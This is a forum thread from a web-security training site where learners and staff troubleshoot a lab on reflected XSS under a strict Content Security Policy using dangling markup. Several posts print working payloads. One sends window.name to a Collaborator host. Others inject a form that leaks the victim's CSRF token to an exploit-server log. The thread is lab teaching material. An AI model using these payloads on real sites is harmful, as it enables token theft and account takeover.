Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Reflected XSS protected by very strict CSP, with dangling markup attack

Alexander | Last updated: Apr 30, 2023 03:24PM UTC

I can't complete the lab. After I "Deliver the exploit" to victim, I get nothing in the Collaborator. No response at all. I follow everything it says in the solution, I tried several videos with people doing it, but nothing helps. In other labs the Collaborator works just fine. It is just this lab. Any tips?

Ben, PortSwigger Agent | Last updated: May 03, 2023 09:03AM UTC

Hi Alex, I have just replied to your email about this but, for completeness, I will add this here as well. We have had a look at this and we think the suggested solution is slightly incorrect. It should read, as follows (there appears to be an erroneous '/web-security/cross-site-scripting/content-security-policy/' path within the script): <script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> Are you able to try this and see if this then works for you?

Alexander | Last updated: May 03, 2023 11:39AM UTC

Thank you very much, your script worked like a charm! Got the lab completed.

rayman | Last updated: Jul 25, 2023 12:44PM UTC

Is there a particular reason why the solution hasn't been updated since? I had to find this issue to understand that the provided solution is erroneous after trying to understand it for quite some time :D

Ben, PortSwigger Agent | Last updated: Jul 25, 2023 12:50PM UTC

Hi, The work to change the solution is still with the content team, I am afraid. They are a small team but will be working on this in due course.

rayman | Last updated: Jul 25, 2023 01:15PM UTC

I understand that. Disregarding this small issue, the labs are extremely good and educational. Thanks for responding!

Matteo | Last updated: Dec 09, 2023 12:41PM UTC

Hi, I've the same problem... And the Ben's script doesn't work anymore (now it's the official solution)... I've tried with my payload and it doesn't work... I've tried with official solution and it doesn't work... Investigating, the problem seems to be the <base> tag: in fact, when I click on "Click me" and I go to the new tab and try to read "window.name" from Developers Console, it is empty... Maybe the problem is related to "\n" chars in the "target" attributes of <base> tag... In fact, trying locally, if I set a "target" attribute without "\n", it works setting the "window.name" of the new tab... But if there are "\n" chars, not... Anyone has some useful info to complete this lab? Thanks

Ben, PortSwigger Agent | Last updated: Dec 11, 2023 10:35AM UTC

Hi Matteo, Unfortunately, a Chrome update has rendered the existing written solution invalid. We believe that we have a new way to solve the lab but are currently running a small competition for users to try and identify a new approach: https://twitter.com/portswiggerres/status/1726605124443750893?s=46 We will update the official written solution in due course.

Filip | Last updated: May 24, 2024 05:27PM UTC

Really nice lab. I have found another solution to exploit the XSS with Chrome blocking the dangling markup attack.

wilson | Last updated: Jun 05, 2024 07:58AM UTC

That's true. Nice lab. I have tested another solution, it works. Hints: using formaction.

Sandeep | Last updated: Jun 20, 2024 11:16AM UTC

Can anyone post any better alternative hint/solution for this lab, I am a beginner and I tried the lab for 2 days but am not able to solve it

Ben, PortSwigger Agent | Last updated: Jun 20, 2024 12:09PM UTC

Hi Sandeep, The following alternative solution should still work: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Hamza | Last updated: Jul 02, 2024 05:22AM UTC

I have tried all solutions that are here, but no one is working.

Ben, PortSwigger Agent | Last updated: Jul 02, 2024 09:34AM UTC

Hi Hamza, I have just tried the alternative solution provided in the link in the previous post and this still works - are you able to clarify what steps you have taken and what issues you are currently facing so that we can assist you further with this?

Hamza | Last updated: Jul 04, 2024 06:35PM UTC

Hey Ben, I have tried solution from : https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ When i try this <script> location='https://0a3a006c041ba288822ff20900fa00c8.web-security-academy.net/my-account?email=%22%3E%3C/form%3E%3Cform%20class=%22login-form%22%20name=%22evil-form%22%20action=%22https://exploit-0aad00e50419a26982bdf14301f9006c.exploit-server.net/log%22%20method=%22GET%22%3E%3Cbutton%20class=%22button%22%20type=%22submit%22%3E%20Click%20me%20%3C/button%3E'; </script> I didn't get the CSRF token from the Victum. I have checked logs many time.

Hamza | Last updated: Jul 04, 2024 06:45PM UTC

Well, I Tried again and now i have solved it thank you. I have used it: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Joshua | Last updated: Jul 27, 2024 12:16AM UTC

Does that only work in Chrome? I can't hit the collab server using that solution in firefox.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 07:13AM UTC

Hi Joshua, I have only tried the alternative solution in Firefox - which did work for me.

bruhmoment236 | Last updated: Aug 07, 2024 01:14PM UTC

It doesn't work now. It seems like the bot isn't clicking on the button from what I have tested. If I try the exploit myself and simulate the click I get the csrf token without any problems.

Michelle, PortSwigger Agent | Last updated: Aug 08, 2024 09:56AM UTC

Hi If you're following the solution published with the lab, you will encounter issues. Have you tried out the steps in this solution? https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ I've just tested with these and was able to solve the lab. You may need to wait a minute before the victim visits, but you can keep an eye on the exploit server logs to know when they visit. Note: You will need to make sure that the POC you create uses a different email address to the one used by your normal user.

Mostafa | Last updated: Aug 19, 2024 01:49PM UTC

Thanks. I was stuck but tried this solution and it really works: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Yuyu | Last updated: Sep 30, 2024 02:18PM UTC

hi, i tried the solution. The bot doesn't seem to click the button and leak the CSRF tokem. <script> location='https://0ab30080033b6b968b73f4a50058006d.web-security-academy.net/my-account?email="></form><form class="login-form" name="evil-form" action="https://exploit-0a590010031d6bdf8b5bf31f01490052.exploit-server.net/log" method="GET"><button class="button" type="submit">Click</button'; </script> manual click did log my own csrf token. Wait a while but no victim click still.

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:44AM UTC